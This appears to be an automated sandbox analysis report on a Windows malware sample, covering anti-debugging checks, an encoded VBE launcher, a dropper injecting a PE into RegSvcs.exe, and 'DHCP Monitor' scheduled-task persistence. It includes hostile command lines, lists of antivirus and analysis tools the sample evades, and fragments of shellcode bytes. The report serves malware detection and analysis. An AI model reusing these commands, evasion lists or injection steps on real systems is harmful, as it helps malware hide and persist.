Code function: 7_2_00255D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

7_2_00255D78

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00977DEE mov eax, dword ptr fs:[00000030h]		0_2_00977DEE
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00275078 mov eax, dword ptr fs:[00000030h]		7_2_00275078

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0096F838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe

Code function: 0_2_0097C030 GetProcessHeap,

0_2_0097C030

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002CF3FF BlockInput,

7_2_002CF3FF

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F9D5 SetUnhandledExceptionFilter,	0_2_0096F9D5
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0096F838
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_0096FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0096FBCA
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Code function: 0_2_00978EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00978EBD
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270D65 SetUnhandledExceptionFilter,	7_2_00270D65
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_002829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_002829B2
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00270BCF
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Code function: 7_2_00270FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_00270FB1

HIPS / PFW / Operating System Protection Evasion

Starts an encoded Visual Basic Script (VBE)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe
Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1100000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: FC0000			Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat

Code function: 7_2_002BBB02 SendInput,keybd_event,

7_2_002BBB02

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\P05jmXYKpr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Update-ta.l.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig /renew	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat boaliim.dat ikvvfncnn.bmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\boaliim.dat	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpE45C.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpE586.tmp	Jump to behavior

Contains functionality to query the security center for anti-virus and firewall products

Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: select * from antivirusproductf51e8b6/1////83c4/cffd/6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sessionidonbitmapbitsionoldocessid;dword threadid
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyeem
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeyets
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpeye.exee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endif.
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae2a444794b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8u
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71ce2a4516c7b23a3b4e02140b8r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c718eeba446d7339879deb2540927991o
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c708eba95741
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c700f2a5527d601aa0bce12357886fbb4fg
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb255777417aa96ec3c7c6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c70ae6bc5141t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9da0fe3ac427d61269fq
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41n
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntdll.dll
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41f
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: errorc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss5
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: usbrn
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss[
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproductp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablerm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: powershelle
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: error'
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirus
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbuffer4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetdata
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellz
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssssw
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41l
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssssss&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: regshot.exesd
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorera
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: smartsniff
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark;
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: wireshark
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp64.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process hackerv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exe
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: process explorer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: processhacker.exe%
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: taskmgr.exesr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ptrtructcreatea5527d6d
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41m
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dllef5a7537d6v
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9c71deeb25541`
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c41i
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ntunmapviewofsectiond6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: iswow64process
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3856f9cf2de6a45c417
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule61ef5a7537d68
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreate!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: asmrylende0fe3ac427d6*
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: byte[uctcreateb255777
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: word[uctcreate
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dword_ptrc61ef5a7537d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: virtualallocex9ba597d6
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: kernel32.dll7ca89775d4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastui.exeixreloc8b1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binaryen
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: user32.dllv
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ndowprocw_
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_derivekey@
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandlesetadr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgui.exefcountdec//6{
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_dllhandle\|
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _crypt_decryptdataa326e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: colitems8d3c7a7e851e87
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avgsvc.exe///6b//65//7
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: binbufferetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sexemodule3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: objantivirusproducte8e4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountnd ad=
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _runbinary_fixreloc ad&
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disablesysrestore/
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execquery
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bufferasmetptr
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: sssssseplace
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: displayname
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __crypt_refcountdecere
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: egui.exerivekeyand ad
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avastsvc.exextset
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: gdisharedhandletablee
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y08644747068671a053e
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _y0x3499bfda1b69b8cj
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 7424/85/e838//////83c4/8c3h,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 525153565733c/648b7/3/8b76
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b761c8b6e/88b7e2/8b363847
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 75f38/3f6b74/78/3f4b74/2eb
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8bc55f5e5b595a5dc355525153h-
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 578b6c241c85ed74438b453c8b
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2878/3d58b4a188b5a2//3dde3
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: cf/d/3f8ebf
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: /x6/e84e//////6b//65//72//6e//65//6c//33//32//////6e//74//64//6c//6c//////////////////////////////////////////////////////////////////////////////////////////////////////5b8bfc6a42e8bb/3////8b54242889118b54242c6a3ee8aa/3////89116a4ae8a1/3////89396a1e6a3ce89d/3////6a2268f4//////e891/3////6a266a24e888/3////6a2a6a4/e87f/3////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6a2e6a/ce876/3////6a3268c8//////e86a/3////6a2ae85c/3////8b/9c7/144//////6a12e84d/3////685be814cf51e879/3////6a3ee83b/3////8bd16a1ee832/3////6a4/ff32ff31ffd/6a12e823/3////685be814cf51e84f/3////6a1ee811/3////8b/98b513c6a3ee8/5/3////8b39/3fa6a22e8fa/2////8b/968f8//////5751ffd/6a//e8e8/2////6888feb31651e814/3////6a2ee8d6/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b396a2ae8cd/2////8b116a42e8c4/2////57526a//6a//6a/46a//6a//6a//6a//ff31ffd/6a12e8a9/2////68d/371/f251e8d5/2////6a22e897/2////8b116a2ee88e/2////8b/9ff7234ff31ffd/6a//e87e/2////689c951a6e51e8aa/2////6a22e86c/2////8b118b396a2ee861/2////8b/96a4/68//3/////ff725/ff7734ff31ffd/6a36e847/2////8bd16a22e83e/2////8b396a3ee835/2//
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: //8b316a22e82c/2////8b/16a2ee823/2////8b/952ff775456ff7/34ff316a//e81//2////68a16a3dd851e83c/2////83c4/cffd/6a12e8f9/1////685be814cf51e825/2////6a22e8e7/1////8b1183c2/66a3ae8db/1////6a/25251ffd/6a36e8ce/1////c7/1////////b828//////6a36e8bc/1////f7216a1ee8b3/1////8b118b523c81c2f8///////3d/6a3ee89f/1/////3116a26e896/1////6a
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2852ff316a12e88a/1////685be814cf51e8b6/1////83c4/cffd/6a26e873/1////8b398b/98b71146a3ee865/1/////3316a26e85c/1////8b/98b51/c6a22e85//1////8b/9/351346a46e844/1////8bc16a2ee83b/1////8b/95/ff771/5652ff316a//e82a/1////68a16a3dd851e856/1////83c4/cffd/6a36e813/1////8b1183c2/189116a3ae8/5/1////8b/93bca/f8533ffffff6a32e8f4//////
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8b/9c7/1/7///1//6a//e8e5//////68d2c7a76851e811/1////6a32e8d3//////8b116a2ee8ca//////8b/952ff71/4ffd/6a22e8bb//////8b3983c7346a32e8af//////8b318bb6a4//////83c6/86a2ee89d//////8b116a46e894//////516a/45756ff326a//e886//////68a16a3dd851e8b2//////83c4/cffd/6a22e86f//////8b/98b5128/351346a32e86///////8b/981c1b///////89116a//e8
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 4f//////68d3c7a7e851e87b//////6a32e83d//////8bd16a2ee834//////8b/9ff32ff71/4ffd/6a//e824//////68883f4a9e51e85///////6a2ee812//////8b/9ff71/4ffd/6a4ae8/4//////8b2161c38bcb/34c24/4c36a//e8f2ffffff6854caaf9151e81e//////6a4/68//1/////ff7424186a//ffd/ff742414e8cfffffff89/183c41/c3e822//////68a44e/eec5/e84b//////83c4/8ff7424/4
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ffd/ff7424/85/e838//////83c4/8c355525153565733c/648b7/3/8b76/c8b761c8b6e/88b7e2/8b3638471875f38/3f6b74/78/3f4b74/2ebe78bc55f5e5b595a5dc35552515356578b6c241c85ed74438b453c8b542878/3d58b4a188b5a2//3dde33/498b348b/3f533ff33c/fcac84c/74/7c1cf/d/3f8ebf43b7c242/75e18b5a24/3dd668b/c4b8b5a1c/3dd8b/48b/3c55f5e5b595a5dc3c3////////r
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\windows
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethoden0
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitmethodpo
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antianalysis!
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversep,
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: disableuac
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @exitcode
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: c:\users\user
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antitask`+
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: xcountcharso
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fillattributer
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: eghgwwhcc
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: osminorversion1
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: reserved?
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ycountchars
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: showwindow(
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rgsvcs.ex t
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: antivirusntext
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: _reversebs
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: execute_vbs_vm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ikvvfncnn.bmp
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: install_path
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: logmaker
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: anti_botkillvm
Source: boaliim.dat, 00000007.00000003.424090847.0000000001861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: persistenceq
